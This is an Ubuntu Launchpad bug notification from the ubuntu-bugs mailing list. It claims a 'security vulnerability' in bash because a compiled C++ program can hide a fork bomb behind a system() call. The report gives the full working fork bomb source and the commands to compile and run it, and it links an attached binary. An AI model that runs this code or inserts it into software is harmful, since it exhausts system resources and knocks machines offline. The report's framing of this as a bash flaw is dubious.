*** This bug is a security vulnerability ***
Public security bug reported:
$ gedit bomb.cpp
> #include <iostream>
> #include <cstdio>
> #include <cstdlib>
>
> using namespace std;
>
> int main() {
> system("./bomb|./bomb&");
> return 0;
> }
$ g++ bomb.cpp -o bomb
$ ./bomb
As can be seen, it's VERY easy to use the "system" function as a means
of hiding a shell fork bomb inside an object file -- a chilling tale
indeed.
ProblemType: Bug
DistroRelease: Ubuntu 12.10
Package: bash 4.2-5ubuntu1
Uname: Linux 3.4.0 x86_64
ApportVersion: 2.6.1-0ubuntu9
Architecture: amd64
Date: Fri Jan 18 23:11:58 2013
InstallationDate: Installed on 2012-04-26 (267 days ago)
InstallationMedia: Ubuntu 12.04 LTS "Precise Pangolin" - Release amd64
(20120425)
MarkForUpload: True
ProcEnviron:
TERM=xterm
PATH=(custom, no user)
XDG_RUNTIME_DIR=<set>
LANG=en_US.UTF-8
SHELL=/bin/bash
SourcePackage: bash
UpgradeStatus: Upgraded to quantal on 2013-01-17 (1 days ago)
** Affects: bash (Ubuntu)
Importance: Undecided
Status: New
** Tags: amd64 apport-bug quantal running-unity
** Attachment added: "Object file that the source code in post compiles to"
https://bugs.launchpad.net/bugs/1101691/+attachment/3488436/+files/bomb
** Information type changed from Private Security to Public Security
--
You received this bug notification because you are a member of Ubuntu
Bugs, which is subscribed to Ubuntu.
https://bugs.launchpad.net/bugs/1101691
Title:
Security alert: Concealment of shell fork bomb inside compiled code
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1101691/+subscriptions
--
ubuntu-bugs mailing list
[email protected]
https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
